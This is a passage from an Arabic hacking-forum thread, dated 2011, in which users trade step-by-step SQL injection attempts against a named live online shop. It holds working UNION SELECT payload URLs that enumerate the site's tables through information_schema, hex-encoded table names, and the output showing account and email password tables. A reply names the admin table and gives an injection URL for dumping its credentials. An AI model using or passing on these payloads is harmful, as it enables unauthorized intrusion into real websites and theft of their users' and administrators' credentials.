 | اقتباس |  | | |  |  المشاركة الأصلية كتبت بواسطة Masaru |  | | | | | | | | | عدد الاعمده المصابه 4
كود PHP: UNION SELECT 1,2,3,4
العامود المصاب 4
أصدار القاعده 5
كتبت الاستغلال كامل
كود PHP: http://www.shopmbtnice.com/article.php?id=-1 UNION SELECT 1,2,3,concat(table_Name,0x3a,column_Name,0x3a,table_schema),5+From+information_schema.columns+Where+column_name+like+CHAR(37, 112, 97, 115, 37)--
طلع لي
كود PHP: tb_account:password:shopmbtnice
أضفت على الاستغلال السابق كلمت Group
الناتج
كود PHP: tb_account:password:shopmbtnice
tb_email:password:shopmbtnice
أخذت هذي الكلمه (tb_account) وشفرتها في موقع التشفير
وكتبت
كود PHP: where+table_Name=0x74625f6163636f756e74
بدل أستعلام جدول الباس
طلع الناتج
كود PHP: tb_account:id:shopmbtnice
أنا ألي هنا وقفت ما عرفت أكمل
وأحنى هنا على شان نتعلم من بعض
والي قدر يحقن الموقع يقلي أذا كان عندي خطأ ولا لا
بالتوفيق للجميع | |  | |  | |
أجل صحيح لاكن هدا tb_account جدول الأعضاء
هدا هو جدول الأدمن tb_admin
من بعد ما شفرت ضع أمر group_ ليطلع لك جميع الأعمدة
من بعد ستصبح الحقنة هكدا
http://www.shopmbtnice.com/article.p...rom+tb_admin--
بالتوفيق
01-22-2011, 01:34 AM
العرض الشجري
